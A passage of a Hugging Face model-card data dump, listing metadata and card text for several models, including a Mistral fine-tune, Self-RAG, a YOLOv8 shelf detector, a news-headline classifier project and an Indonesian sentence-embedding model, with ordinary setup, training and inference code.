We present a neural network structure, ControlNet, to control pretrained large diffusion models to support additional input conditions. The ControlNet learns task-specific conditions in an end-to-end way, and the learning is robust even when the training dataset is small (< 50k). Moreover, training a ControlNet is as fast as fine-tuning a diffusion model, and the model can be trained on a personal devices. Alternatively, if powerful computation clusters are available, the model can scale to large amounts (millions to billions) of data. We report that large diffusion models like Stable Diffusion can be augmented with ControlNets to enable conditional inputs like edge maps, segmentation maps, keypoints, etc. This may enrich the methods to control large diffusion models and further facilitate related applications. |
MMaitra/mistral_7b_instruct_finetuned_multi_intent_v2 | MMaitra | 2024-01-22T05:03:23Z | 5 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"bitsandbytes",
"region:us"
] | text-generation | 2024-01-22T05:00:16Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
CLMBR/binding-domain-transformer-1 | CLMBR | 2024-01-22T04:41:05Z | 12 | 0 | transformers | [
"transformers",
"pytorch",
"opt",
"text-generation",
"generated_from_trainer",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-17T22:41:41Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-domain-transformer-1
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-domain-transformer-1
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.8640
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 1
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.2283 | 0.03 | 76320 | 4.1941 |
| 4.0243 | 1.03 | 152640 | 4.0262 |
| 3.9173 | 0.03 | 228960 | 3.9514 |
| 3.8504 | 1.03 | 305280 | 3.9111 |
| 3.7979 | 0.03 | 381600 | 3.8853 |
| 3.7588 | 1.03 | 457920 | 3.8699 |
| 3.7224 | 0.03 | 534240 | 3.8585 |
| 3.6906 | 1.03 | 610560 | 3.8527 |
| 3.6618 | 0.03 | 686880 | 3.8482 |
| 3.6386 | 1.03 | 763200 | 3.8459 |
| 3.6152 | 0.03 | 839520 | 3.8439 |
| 3.5967 | 1.03 | 915840 | 3.8431 |
| 3.5763 | 0.03 | 992160 | 3.8437 |
| 3.5566 | 1.03 | 1068480 | 3.8448 |
| 3.5413 | 0.03 | 1144800 | 3.8449 |
| 3.5279 | 1.03 | 1221120 | 3.8464 |
| 3.5106 | 0.03 | 1297440 | 3.8481 |
| 3.4966 | 1.03 | 1373760 | 3.8490 |
| 3.4844 | 0.03 | 1450080 | 3.8513 |
| 3.4781 | 1.03 | 1526400 | 3.8521 |
| 3.4691 | 0.03 | 1602720 | 3.8546 |
| 3.4597 | 1.03 | 1679040 | 3.8549 |
| 3.4479 | 0.03 | 1755360 | 3.8568 |
| 3.4377 | 0.03 | 1831680 | 3.8569 |
| 3.4244 | 1.03 | 1908000 | 3.8591 |
| 3.4133 | 0.03 | 1984320 | 3.8610 |
| 3.4017 | 1.03 | 2060640 | 3.8621 |
| 3.3917 | 0.03 | 2136960 | 3.8624 |
| 3.3815 | 1.03 | 2213280 | 3.8639 |
| 3.3687 | 0.03 | 2289600 | 3.8646 |
| 3.359 | 1.03 | 2365920 | 3.8655 |
| 3.3507 | 0.03 | 2442240 | 3.8657 |
| 3.3372 | 1.03 | 2518560 | 3.8672 |
| 3.3274 | 0.03 | 2594880 | 3.8672 |
| 3.3177 | 1.03 | 2671200 | 3.8677 |
| 3.3143 | 0.03 | 2747520 | 3.8678 |
| 3.3102 | 1.03 | 2823840 | 3.8670 |
| 3.3059 | 0.03 | 2900160 | 3.8662 |
| 3.2984 | 1.03 | 2976480 | 3.8647 |
| 3.2904 | 0.02 | 3052726 | 3.8640 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
thangvip/vi-t5-reward-model-5-epochs | thangvip | 2024-01-22T04:40:38Z | 4 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text-classification",
"generated_from_trainer",
"base_model:thangvip/vi-t5-base-finetune-rewriter-5-epochs",
"base_model:finetune:thangvip/vi-t5-base-finetune-rewriter-5-epochs",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-22T04:40:00Z | ---
license: mit
base_model: thangvip/vi-t5-base-finetune-rewriter-5-epochs
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: vi-t5-reward-model-5-epochs
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# vi-t5-reward-model-5-epochs
This model is a fine-tuned version of [thangvip/vi-t5-base-finetune-rewriter-5-epochs](https://huggingface.co/thangvip/vi-t5-base-finetune-rewriter-5-epochs) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.4372
- Accuracy: 0.8238
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1.41e-05
- train_batch_size: 32
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 5
### Training results
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
linhcuem/chamdiemgianhang_yolov8 | linhcuem | 2024-01-22T04:37:47Z | 4 | 0 | ultralytics | [
"ultralytics",
"tensorboard",
"v8",
"ultralyticsplus",
"yolov8",
"yolo",
"vision",
"object-detection",
"pytorch",
"model-index",
"region:us"
] | object-detection | 2024-01-22T04:37:42Z |
---
tags:
- ultralyticsplus
- yolov8
- ultralytics
- yolo
- vision
- object-detection
- pytorch
library_name: ultralytics
library_version: 8.0.43
inference: false
model-index:
- name: linhcuem/chamdiemgianhang_yolov8
results:
- task:
type: object-detection
metrics:
- type: precision # since [email protected] is not available on hf.co/metrics
value: 0.86296 # min: 0.0 - max: 1.0
name: [email protected](box)
---
<div align="center">
<img width="640" alt="linhcuem/chamdiemgianhang_yolov8" src="https://huggingface.co/linhcuem/chamdiemgianhang_yolov8/resolve/main/thumbnail.jpg">
</div>
### Supported Labels
```
['bom_gen', 'bom_jn', 'bom_knp', 'bom_sachet', 'bom_vtgk', 'bom_ytv', 'hop_jn', 'hop_vtg', 'hop_ytv', 'lo_kid', 'lo_ytv', 'loc_dln', 'loc_jn', 'loc_kids', 'loc_ytv', 'pocky', 'tui_gen', 'tui_jn', 'tui_sachet', 'tui_vtgk']
```
### How to use
- Install [ultralyticsplus](https://github.com/fcakyon/ultralyticsplus):
```bash
pip install ultralyticsplus==0.0.28 ultralytics==8.0.43
```
- Load model and perform prediction:
```python
from ultralyticsplus import YOLO, render_result
# load model
model = YOLO('linhcuem/chamdiemgianhang_yolov8')
# set model parameters
model.overrides['conf'] = 0.25 # NMS confidence threshold
model.overrides['iou'] = 0.45 # NMS IoU threshold
model.overrides['agnostic_nms'] = False # NMS class-agnostic
model.overrides['max_det'] = 1000 # maximum number of detections per image
# set image
image = 'https://github.com/ultralytics/yolov5/raw/master/data/images/zidane.jpg'
# perform inference
results = model.predict(image)
# observe results
print(results[0].boxes)
render = render_result(model=model, image=image, result=results[0])
render.show()
```
|
ZhiguangHan/mt5-small-task3-dataset4 | ZhiguangHan | 2024-01-22T04:37:35Z | 5 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"mt5",
"text2text-generation",
"generated_from_trainer",
"base_model:google/mt5-small",
"base_model:finetune:google/mt5-small",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2023-12-09T17:50:34Z | ---
license: apache-2.0
base_model: google/mt5-small
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: mt5-small-task3-dataset4
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# mt5-small-task3-dataset4
This model is a fine-tuned version of [google/mt5-small](https://huggingface.co/google/mt5-small) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 1.6024
- Accuracy: 0.038
- Mse: 6.4524
- Log-distance: 0.6628
- S Score: 0.4912
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5.6e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 15
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | Mse | Log-distance | S Score |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:------:|:------------:|:-------:|
| 12.4369 | 1.0 | 250 | 2.2550 | 0.038 | 6.7116 | 0.6817 | 0.4748 |
| 3.1387 | 2.0 | 500 | 1.8576 | 0.024 | 5.8813 | 0.7455 | 0.4552 |
| 2.3265 | 3.0 | 750 | 1.6663 | 0.05 | 7.7168 | 0.7232 | 0.4556 |
| 1.9955 | 4.0 | 1000 | 1.6121 | 0.04 | 6.3175 | 0.6614 | 0.4908 |
| 1.8234 | 5.0 | 1250 | 1.6380 | 0.034 | 6.8099 | 0.6780 | 0.4860 |
| 1.7591 | 6.0 | 1500 | 1.5953 | 0.04 | 6.3175 | 0.6614 | 0.4908 |
| 1.7194 | 7.0 | 1750 | 1.5996 | 0.054 | 6.0821 | 0.6559 | 0.4976 |
| 1.6988 | 8.0 | 2000 | 1.5970 | 0.048 | 6.6575 | 0.6618 | 0.4952 |
| 1.6831 | 9.0 | 2250 | 1.6024 | 0.038 | 6.4524 | 0.6628 | 0.4912 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
selfrag/selfrag_llama2_7b | selfrag | 2024-01-22T04:06:17Z | 4,136 | 77 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"arxiv:2310.11511",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2023-10-18T00:12:34Z | ---
license: mit
---
This model is a 7B [Self-RAG](https://selfrag.github.io/) model that generates outputs to diverse user queries as well as *reflection tokens* to call the retrieval system adaptively and criticize its own output and retrieved passages.
Self-RAG is trained on our instruction-following corpora with interleaving passages and reflection tokens using the standard next-token prediction objective, enabling efficient and stable learning with fine-grained feedback.
At inference, we leverage reflection tokens covering diverse aspects of generations to sample the best output aligning users' preferences.
See full descriptions in See full descriptions in [our paper](https://arxiv.org/abs/2310.11511).
## Usage
Here, we show an easy way to quickly download our model from HuggingFace and run with `vllm` with pre-given passages. Make sure to install dependencies listed at [self-rag/requirements.txt](https://github.com/AkariAsai/self-rag/blob/main/requirements.txt).
To run our full inference pipeline with a retrieval system and fine-grained tree decoding, please use [our code](https://github.com/AkariAsai/self-rag).
```py
from transformers import AutoTokenizer, AutoModelForCausalLM
from vllm import LLM, SamplingParams
model = LLM("selfrag/selfrag_llama2_7b", download_dir="/gscratch/h2lab/akari/model_cache", dtype="half")
sampling_params = SamplingParams(temperature=0.0, top_p=1.0, max_tokens=100, skip_special_tokens=False)
def format_prompt(input, paragraph=None):
prompt = "### Instruction:\n{0}\n\n### Response:\n".format(input)
if paragraph is not None:
prompt += "[Retrieval]<paragraph>{0}</paragraph>".format(paragraph)
return prompt
query_1 = "Leave odd one out: twitter, instagram, whatsapp."
query_2 = "Can you tell me the difference between llamas and alpacas?"
queries = [query_1, query_2]
preds = model.generate([format_prompt(query) for query in queries], sampling_params)
for pred in preds:
print("Model prediction: {0}".format(pred.outputs[0].text))
# Model prediction: Twitter, Instagram, and WhatsApp are all social media platforms.[No Retrieval]WhatsApp is the odd one out because it is a messaging app, while Twitter and # Instagram are primarily used for sharing photos and videos.[Utility:5]</s> (this query doesn't require factual grounding; just skip retrieval and do normal instruction-following generation)
# Model prediction: Sure![Retrieval]<paragraph> ... (this query requires factual grounding, call a retriever)
# generate with retrieved passage
prompt = format_prompt("Can you tell me the difference between llamas and alpacas?", paragraph="The alpaca (Lama pacos) is a species of South American camelid mammal. It is similar to, and often confused with, the llama. Alpacas are considerably smaller than llamas, and unlike llamas, they were not bred to be working animals, but were bred specifically for their fiber.")
preds = model.generate([prompt], sampling_params)
print([pred.outputs[0].text for pred in preds])
# ['[Relevant]Alpacas are considerably smaller than llamas, and unlike llamas, they were not bred to be working animals, but were bred specifically for their fiber.[Fully supported][Utility:5]</s>']
```
## Input Format
As described in the `format_prompt` function, your input should be formed as
```
### Instruction:\n{instruction}\n\n### Response:\n".format(instruction)
```
or
```
### Instruction:\n{instruction}\n\n### Input:\n{input}\n\n### Response:\n"
```
If you have additional input.
You can insert paragraphs anywhere after `### Response:\n"`, but make sure to mark paragraphs as paragraph tokens (i.e., `<paragraph>{0}</paragraph>`).
## Training details
Our training data is available at the HuggingFace dataset [selfrag_train_data](https://huggingface.co/datasets/selfrag/selfrag_train_data).
See our official repository for the training details.
We used 8 A100 40GB for training on the Stability HPC server.
## Citation and contact
If you use this model, please cite our work:
```
@article{asai2023selfrag,
author = {Asai, Akari and Wu, Zeqiu and Wang, Yizhong and Sil, Avirup and Hajishirzi, Hannaneh},
title = {{Self-RAG}: Learning to Retrieve, Generate, and Critique through Self-Reflection},
year = {2023},
journal = { arXiv preprint arXiv:2310.11511 },
URL = {https://arxiv.org/abs/2310.11511}
}
``` |
piddnad/DDColor-models | piddnad | 2024-01-22T04:03:13Z | 0 | 23 | null | [
"arxiv:2212.11613",
"license:apache-2.0",
"region:us"
] | null | 2023-09-07T07:42:11Z | ---
license: apache-2.0
---
Pretrained model for DDColor
For more information, see [DDColor Model Zoo](https://github.com/piddnad/DDColor/blob/main/MODEL_ZOO.md)
* Paper: https://arxiv.org/abs/2212.11613
* Code: https://github.com/piddnad/DDColor
## Citation
If our work is helpful for your research, please consider citing:
```
@article{kang2022ddcolor,
title={DDColor: Towards Photo-Realistic Image Colorization via Dual Decoders},
author={Kang, Xiaoyang and Yang, Tao and Ouyang, Wenqi and Ren, Peiran and Li, Lingzhi and Xie, Xuansong},
journal={arXiv preprint arXiv:2212.11613},
year={2022}
}
``` |
Leeps/sd-font-model | Leeps | 2024-01-22T04:00:26Z | 3 | 3 | diffusers | [
"diffusers",
"tensorboard",
"safetensors",
"stable-diffusion",
"stable-diffusion-diffusers",
"text-to-image",
"dataset:Leeps/Fonts-Individual-Letters",
"base_model:runwayml/stable-diffusion-v1-5",
"base_model:finetune:runwayml/stable-diffusion-v1-5",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | 2024-01-21T21:16:58Z |
---
license: creativeml-openrail-m
base_model: runwayml/stable-diffusion-v1-5
datasets:
- Leeps/Fonts-Individual-Letters
tags:
- stable-diffusion
- stable-diffusion-diffusers
- text-to-image
- diffusers
inference: true
---
# Text-to-image finetuning - Leeps/sd-font-model
This pipeline was finetuned from **runwayml/stable-diffusion-v1-5** on the **Leeps/Fonts-Individual-Letters** dataset. Below are some example images generated with the finetuned pipeline using the following prompts: None:
## Pipeline usage
You can use the pipeline like so:
```python
from diffusers import DiffusionPipeline
import torch
pipeline = DiffusionPipeline.from_pretrained("Leeps/sd-font-model", torch_dtype=torch.float16)
```
## Training info
These are the key hyperparameters used during training:
* Epochs: 1
* Learning rate: 1e-05
* Batch size: 1
* Gradient accumulation steps: 4
* Image resolution: 64
* Mixed-precision: fp16
|
transiteration/scaling-ml | transiteration | 2024-01-22T03:55:42Z | 0 | 0 | null | [
"pytorch",
"mlflow",
"ray",
"fastapi",
"nlp",
"text-classification",
"en",
"license:mit",
"region:us"
] | text-classification | 2024-01-21T22:17:43Z | ---
license: mit
language:
- en
pipeline_tag: text-classification
tags:
- pytorch
- mlflow
- ray
- fastapi
- nlp
---
## Scaling-ML
Scaling-ML is a project that classifies news headlines into 10 groups.
The main part of the project fine-tuning of the [BERT](https://huggingface.co/allenai/scibert_scivocab_uncased)[1] model and including tools like MLflow for tracking experiments, Ray for scaling and distibuted computing, and MLOps components for seamless management of machine learning workflows.
### Set Up
1. Clone the repository:
```bash
git clone https://github.com/your-username/scaling-ml.git
cd scaling-ml
```
2. Set up your virtual environment and install dependencies:
```bash
export PYTHONPATH=$PYTHONPATH:$PWD
pip install -r requirements.txt
```
### Scripts Overview
```bash
scripts
├── app.py
├── config.py
├── data.py
├── evaluate.py
├── model.py
├── predict.py
├── train.py
├── tune.py
└── utils.py
```
- `app.py` - Implementation of FastAPI web service for serving a model.
- `config.py` - Configuration of logging settings, directory structures, and MLflow registry.
- `data.py`- Functions and a class for data preprocessing tasks in a scalable machine learning project.
- `evaluate.py` - Evaluating the performance of a model, calculating precision, recall and F1 score.
- `model.py` - Finetuned language model by adding a fully connected layer for classification tasks.
- `predict.py` - TorchPredictor class for making predictions using a PyTorch-based model.
- `train.py` - Training process using Ray for distributed training.
- `tune.py` - Hyperparameter tuning for Language Model using Ray Tune.
- `utils.py` - Various utility functions for handling data, setting random seeds, saving and loading dictionaries, etc.
#### Dataset
For training, small portion of the [News Category Dataset](https://www.kaggle.com/datasets/setseries/news-category-dataset) was used, which contains numerous headlines and descriptions of various articles.
### How to Train
```bash
export DATASET_LOC="path/to/dataset"
export TRAIN_LOOP_CONFIG='{"dropout_p": 0.5, "lr": 1e-4, "lr_factor": 0.8, "lr_patience": 5}'
python3 scripts/train.py \
--experiment_name "llm_train" \
--dataset_loc $DATASET_LOC \
--train_loop_config "$TRAIN_LOOP_CONFIG" \
--num_workers 1 \
--cpu_per_worker 1 \
--gpu_per_worker 0 \
--num_epochs 1 \
--batch_size 128 \
--results_fp results.json
```
- experiment_name: A name for the experiment or run, in this case, "llm".
- dataset_loc: The location of the training dataset, replace with the actual path.
- train_loop_config: The configuration for the training loop, replace with the actual configuration.
- num_workers: The number of workers used for parallel processing. Adjust based on available CPU resources.
- cpu_per_worker: The number of CPU cores assigned to each worker. Adjust based on available CPU resources.
- gpu_per_worker: The number of GPUs assigned to each worker. Adjust based on available GPU resources.
- num_epochs: The number of training epochs.
- batch_size: The batch size used during training.
- results_fp: The file path to save the results.
### How to Tune
```bash
export DATASET_LOC="path/to/dataset"
export INITIAL_PARAMS='{"dropout_p": 0.5, "lr": 1e-4, "lr_factor": 0.8, "lr_patience": 5}'
python3 scripts/tune.py \
--experiment_name "llm_tune" \
--dataset_loc "$DATASET_LOC" \
--initial_params "$INITIAL_PARAMS" \
--num_workers 1 \
--cpu_per_worker 1 \
--gpu_per_worker 0 \
--num_runs 1 \
--grace_period 1 \
--num_epochs 1 \
--batch_size 128 \
--results_fp results.json
```
- num_runs: The number of tuning runs to perform.
- grace_period: The grace period for early stopping during hyperparameter tuning.
**Note**: modify the values of the `--num-workers`, `--cpu-per-worker`, and `--gpu-per-worker` input parameters below according to the resources available on your system.
### Experiment Tracking with MLflow
```bash
mlflow server -h 0.0.0.0 -p 8080 --backend-store-uri /path/to/mlflow/folder
```
### Evaluation
```bash
export RUN_ID=YOUR_MLFLOW_EXPERIMENT_RUN_ID
python3 evaluate.py --run_id $RUN_ID --dataset_loc "path/to/dataset" --results_fp results.json
```
```json
{
"timestamp": "January 22, 2024 09:57:12 AM",
"precision": 0.9163323229539818,
"recall": 0.9124083769633508,
"f1": 0.9137224104301406,
"num_samples": 1000.0
}
```
- run_id: ID of the specific MLflow run to load from.
### Inference
```
python3 predict.py --run_id $RUN_ID --headline "Airport Guide: Chicago O'Hare" --keyword "destination"
```
```json
[
{
"prediction": "TRAVEL",
"probabilities": {
"BUSINESS": 0.0024151806719601154,
"ENTERTAINMENT": 0.002721842611208558,
"FOOD & DRINK": 0.001193400239571929,
"PARENTING": 0.0015436559915542603,
"POLITICS": 0.0012392215430736542,
"SPORTS": 0.0020724297501146793,
"STYLE & BEAUTY": 0.0018642042996361852,
"TRAVEL": 0.9841892123222351,
"WELLNESS": 0.0013303911546245217,
"WORLD NEWS": 0.0014305398799479008
}
}
]
```
### Application
```bash
python3 app.py --run_id $RUN_ID --num_cpus 2
```
Now, we can send requests to our application:
```python
import json
import requests
headline = "Reboot Your Skin For Spring With These Facial Treatments"
keywords = "skin-facial-treatments"
json_data = json.dumps({"headline": headline, "keywords": keywords})
out = requests.post("http://127.0.0.1:8010/predict", data=json_data).json()
print(out["results"][0])
```
```json
{
"prediction": "STYLE & BEAUTY",
"probabilities": {
"BUSINESS": 0.002265132963657379,
"ENTERTAINMENT": 0.008689943701028824,
"FOOD & DRINK": 0.0011296054581180215,
"PARENTING": 0.002621663035824895,
"POLITICS": 0.002141285454854369,
"SPORTS": 0.0017548275645822287,
"STYLE & BEAUTY": 0.9760453104972839,
"TRAVEL": 0.0024237297475337982,
"WELLNESS": 0.001382972695864737,
"WORLD NEWS": 0.0015455639222636819
}
```
### Testing the Code
How to test the written code for asserted inputs and outputs:
```bash
python3 -m pytest tests/code --verbose --disable-warnings
```
How to test the Model behaviour:
```bash
python3 -m pytest --run-id $RUN_ID tests/model --verbose --disable-warnings
```
### Workload
To execute all stages of this project with a single command, `workload.sh` script has been provided, change the resource(cpu_nums, gpu_nums, etc.) parameters to suit your needs.
```bash
bash workload.sh
```
### Extras
Makefile to clean the directories and format scripts:
```bash
make style && make clean
```
Served documentation for functions and classes:
```bash
python3 -m mkdocs serve
``` |
LazarusNLP/sct-indobert-base | LazarusNLP | 2024-01-22T03:54:37Z | 9 | 0 | sentence-transformers | [
"sentence-transformers",
"safetensors",
"bert",
"feature-extraction",
"sentence-similarity",
"transformers",
"id",
"dataset:LazarusNLP/wikipedia_id_backtranslated",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] | sentence-similarity | 2024-01-18T15:06:26Z | ---
library_name: sentence-transformers
pipeline_tag: sentence-similarity
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- transformers
datasets:
- LazarusNLP/wikipedia_id_backtranslated
language:
- id
---
# LazarusNLP/sct-indobert-base
This is a [sentence-transformers](https://www.SBERT.net) model: It maps sentences & paragraphs to a 768 dimensional dense vector space and can be used for tasks like clustering or semantic search.
<!--- Describe your model here -->
## Usage (Sentence-Transformers)
Using this model becomes easy when you have [sentence-transformers](https://www.SBERT.net) installed:
```
pip install -U sentence-transformers
```
Then you can use the model like this:
```python
from sentence_transformers import SentenceTransformer
sentences = ["This is an example sentence", "Each sentence is converted"]
model = SentenceTransformer('LazarusNLP/sct-indobert-base')
embeddings = model.encode(sentences)
print(embeddings)
```
## Usage (HuggingFace Transformers)
Without [sentence-transformers](https://www.SBERT.net), you can use the model like this: First, you pass your input through the transformer model, then you have to apply the right pooling-operation on-top of the contextualized word embeddings.
```python
from transformers import AutoTokenizer, AutoModel
import torch
#Mean Pooling - Take attention mask into account for correct averaging
def mean_pooling(model_output, attention_mask):
token_embeddings = model_output[0] #First element of model_output contains all token embeddings
input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()
return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-9)
# Sentences we want sentence embeddings for
sentences = ['This is an example sentence', 'Each sentence is converted']
# Load model from HuggingFace Hub
tokenizer = AutoTokenizer.from_pretrained('LazarusNLP/sct-indobert-base')
model = AutoModel.from_pretrained('LazarusNLP/sct-indobert-base')
# Tokenize sentences
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
# Compute token embeddings
with torch.no_grad():
model_output = model(**encoded_input)
# Perform pooling. In this case, mean pooling.
sentence_embeddings = mean_pooling(model_output, encoded_input['attention_mask'])
print("Sentence embeddings:")
print(sentence_embeddings)
```
## Evaluation Results
<!--- Describe how your model was evaluated -->
For an automated evaluation of this model, see the *Sentence Embeddings Benchmark*: [https://seb.sbert.net](https://seb.sbert.net?model_name=LazarusNLP/sct-indobert-base)
## Training
The model was trained with the parameters:
**DataLoader**:
`torch.utils.data.dataloader.DataLoader` of length 7813 with parameters:
```
{'batch_size': 128, 'sampler': 'torch.utils.data.sampler.RandomSampler', 'batch_sampler': 'torch.utils.data.sampler.BatchSampler'}
```
**Loss**:
`sentence_transformers.losses.SCTLoss_distillation.SCTLoss_distillation`
Parameters of the fit()-Method:
```
{
"epochs": 20,
"evaluation_steps": 0,
"evaluator": "sentence_transformers.evaluation.EmbeddingSimilarityEvaluator.EmbeddingSimilarityEvaluator",
"max_grad_norm": 1,
"optimizer_class": "<class 'torch.optim.adamw.AdamW'>",
"optimizer_params": {
"eps": 1e-06,
"lr": 0.0001
},
"scheduler": "WarmupLinear",
"steps_per_epoch": null,
"warmup_steps": 15626,
"weight_decay": 0.01
}
```
## Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 128, 'do_lower_case': False}) with Transformer model: BertModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False})
)
```
## Citing & Authors
<!--- Describe where people can find more information --> |
migueldeguzmandev/phi-1.5_paperclipmaximizer_v3 | migueldeguzmandev | 2024-01-22T03:51:28Z | 88 | 0 | transformers | [
"transformers",
"pytorch",
"phi",
"text-generation",
"custom_code",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2023-12-11T07:05:47Z | [Research Log: RLFCV2, Petertodd, the paperclip maximizer](https://www.lesswrong.com/posts/doLkRMasXMKyafJrz/research-log-rlfcv2-training-phi-1-5-gpt2xl-and-falcon-rw-1b)
|
